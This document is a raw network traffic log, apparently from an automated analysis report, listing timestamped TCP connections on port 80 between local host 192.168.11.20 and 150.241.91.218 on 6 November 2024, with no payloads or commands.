                                                                                                                                                              Nov 6, 2024 17:37:54.131043911 CET8050049150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.143667936 CET5004980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.144207954 CET5005080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.331980944 CET8050049150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.332056999 CET8050050150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.332256079 CET5004980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.332257032 CET5005080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.332452059 CET5005080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.332452059 CET5005080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.520930052 CET8050050150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.520940065 CET8050050150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.588140011 CET8050050150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.598989964 CET5005080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.599545002 CET5005180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.787269115 CET8050050150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.787440062 CET5005080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.787712097 CET8050051150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.787920952 CET5005180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.788073063 CET5005180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.788073063 CET5005180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:54.977526903 CET8050051150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:54.977543116 CET8050051150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.046652079 CET8050051150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.070873022 CET5005180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.071821928 CET5005280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.259011030 CET8050051150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.259278059 CET5005180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.259573936 CET8050052150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.259779930 CET5005280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.260072947 CET5005280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.260072947 CET5005280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.452697992 CET8050052150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.452713966 CET8050052150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.516755104 CET8050052150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.529454947 CET5005280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.530008078 CET5005380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.718014956 CET8050052150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.718291998 CET5005280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.723845005 CET8050053150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.724091053 CET5005380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.724409103 CET5005380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.724409103 CET5005380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:55.913156986 CET8050053150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.913199902 CET8050053150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:55.983361006 CET8050053150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:56.002186060 CET5005380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.002742052 CET5005480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.194119930 CET8050054150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:56.194344997 CET5005480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.194426060 CET8050053150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:56.194463968 CET5005480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.194463968 CET5005480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.194736004 CET5005380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.383198023 CET8050054150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:56.383243084 CET8050054150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:56.451173067 CET8050054150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:56.494271040 CET5005480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.635956049 CET5005480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.636007071 CET5005580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.823544025 CET8050055150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:56.823774099 CET5005580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.823877096 CET5005580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.823878050 CET5005580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:56.824136972 CET8050054150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:56.824317932 CET5005480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.011652946 CET8050055150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.011697054 CET8050055150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.079164982 CET8050055150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.092256069 CET5005580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.092708111 CET5005680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.283200979 CET8050056150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.283247948 CET8050055150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.283411026 CET5005580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.283422947 CET5005680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.283545017 CET5005680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.283545017 CET5005680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.471586943 CET8050056150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.471791983 CET8050056150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.539436102 CET8050056150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.551554918 CET5005680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.551947117 CET5005780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.739972115 CET8050056150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.740045071 CET8050057150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.740204096 CET5005680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.740252018 CET5005780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.740412951 CET5005780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.740412951 CET5005780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:57.928823948 CET8050057150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:57.928874016 CET8050057150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.004894018 CET8050057150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.019419909 CET5005780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.019977093 CET5005880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.208400011 CET8050057150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.208703041 CET5005780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.208740950 CET8050058150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.209117889 CET5005880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.209327936 CET5005880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.209327936 CET5005880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.402717113 CET8050058150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.402761936 CET8050058150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.464416981 CET8050058150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.474942923 CET5005880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.475372076 CET5005980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.662822008 CET8050058150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.662971973 CET5005880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.665651083 CET8050059150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.665843964 CET5005980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.666043997 CET5005980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.666043997 CET5005980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.861332893 CET8050059150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.861370087 CET8050059150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.924330950 CET8050059150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:58.938385963 CET5005980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:58.938865900 CET5006080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.131983042 CET8050059150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.132246017 CET5005980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.132298946 CET8050060150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.132474899 CET5006080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.132683992 CET5006080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.132683992 CET5006080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.322962046 CET8050060150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.323007107 CET8050060150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.390626907 CET8050060150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.402070045 CET5006080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.402544022 CET5006180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.591511965 CET8050061150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.591700077 CET5006180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.591789961 CET5006180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.591789961 CET5006180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.592515945 CET8050060150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.592807055 CET5006080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.779350042 CET8050061150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.779395103 CET8050061150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.847172976 CET8050061150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:37:59.859358072 CET5006180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:37:59.859807968 CET5006280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.047322035 CET8050061150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.047489882 CET5006180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.047595978 CET8050062150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.047800064 CET5006280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.047899961 CET5006280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.047899961 CET5006280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.235891104 CET8050062150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.235934973 CET8050062150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.305129051 CET8050062150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.317794085 CET5006280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.318432093 CET5006380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.505763054 CET8050062150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.506019115 CET5006280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.506648064 CET8050063150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.506889105 CET5006380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.507062912 CET5006380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.507062912 CET5006380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.700536966 CET8050063150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.700547934 CET8050063150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.763051987 CET8050063150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:00.805857897 CET5006380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.946861982 CET5006380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:00.948151112 CET5006480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.135102987 CET8050063150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.135459900 CET5006380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.136732101 CET8050064150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.137069941 CET5006480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.137207031 CET5006480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.137207031 CET5006480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.325519085 CET8050064150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.325838089 CET8050064150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.395013094 CET8050064150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.406215906 CET5006480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.406848907 CET5006580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.594578028 CET8050064150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.594806910 CET5006480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.595423937 CET8050065150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.595638037 CET5006580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.595768929 CET5006580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.595768929 CET5006580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.783628941 CET8050065150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.783646107 CET8050065150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.852268934 CET8050065150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:01.866127014 CET5006580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:01.866792917 CET5006680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.055289030 CET8050065150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.055309057 CET8050066150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.055536032 CET5006580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.055593967 CET5006680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.055721045 CET5006680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.055721045 CET5006680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.313246012 CET8050066150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.328507900 CET5006680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.329030991 CET5006780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.523351908 CET8050066150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.523370028 CET8050067150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.523644924 CET5006680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.523644924 CET5006780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.523768902 CET5006780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.523768902 CET5006780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.711642981 CET8050067150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.711735010 CET8050067150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.782221079 CET8050067150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.796514034 CET5006780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.797061920 CET5006880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.984523058 CET8050067150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.984708071 CET5006780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.985080004 CET8050068150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:02.985380888 CET5006880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.985630035 CET5006880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:02.985630035 CET5006880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.173456907 CET8050068150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.173472881 CET8050068150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.243905067 CET8050068150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.254806042 CET5006880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.255273104 CET5006980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.445230961 CET8050068150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.445522070 CET5006880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.445548058 CET8050069150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.445852995 CET5006980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.446085930 CET5006980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.446086884 CET5006980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.634417057 CET8050069150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.634459972 CET8050069150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.745038986 CET8050069150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.755460024 CET5006980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.755863905 CET5007080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.943778038 CET8050069150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.943856001 CET8050070150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:03.943994999 CET5006980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.944042921 CET5007080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.944232941 CET5007080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:03.944232941 CET5007080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.132385015 CET8050070150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.132395983 CET8050070150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.204030991 CET8050070150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.215238094 CET5007080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.215640068 CET5007180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.403500080 CET8050070150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.403691053 CET5007080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.403918982 CET8050071150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.404102087 CET5007180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.404269934 CET5007180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.404269934 CET5007180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.593000889 CET8050071150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.593010902 CET8050071150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.660572052 CET8050071150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.673345089 CET5007180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.674020052 CET5007280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.869168043 CET8050071150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.869349003 CET5007180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.869975090 CET8050072150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:04.870206118 CET5007280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.870326996 CET5007280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:04.870387077 CET5007280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.058396101 CET8050072150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.058408976 CET8050072150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.128319979 CET8050072150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.142946959 CET5007280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.143426895 CET5007380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.330688000 CET8050072150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.330892086 CET5007280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.331660032 CET8050073150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.331921101 CET5007380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.332084894 CET5007380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.332084894 CET5007380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.519871950 CET8050073150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.519886017 CET8050073150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.589510918 CET8050073150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.600564003 CET5007380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.601202011 CET5007480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.788816929 CET8050073150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.789011002 CET5007380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.789166927 CET8050074150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.789474964 CET5007480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.789643049 CET5007480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.789643049 CET5007480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:05.977586985 CET8050074150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:05.977622032 CET8050074150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.046096087 CET8050074150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.060646057 CET5007480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.061084032 CET5007580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.248394966 CET8050074150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.248687983 CET5007480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.249634027 CET8050075150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.249855995 CET5007580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.250014067 CET5007580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.250085115 CET5007580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.438350916 CET8050075150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.438404083 CET8050075150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.506539106 CET8050075150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.518786907 CET5007580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.519227028 CET5007680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.707056999 CET8050075150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.707324982 CET5007580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.707451105 CET8050076150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.707964897 CET5007680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.708070993 CET5007680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.708070993 CET5007680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:06.896130085 CET8050076150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:06.896137953 CET8050076150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.062325001 CET8050076150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:38:07.077501059 CET5007680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:38:07.078026056 CET5007780192.168.11.20150.241.91.218
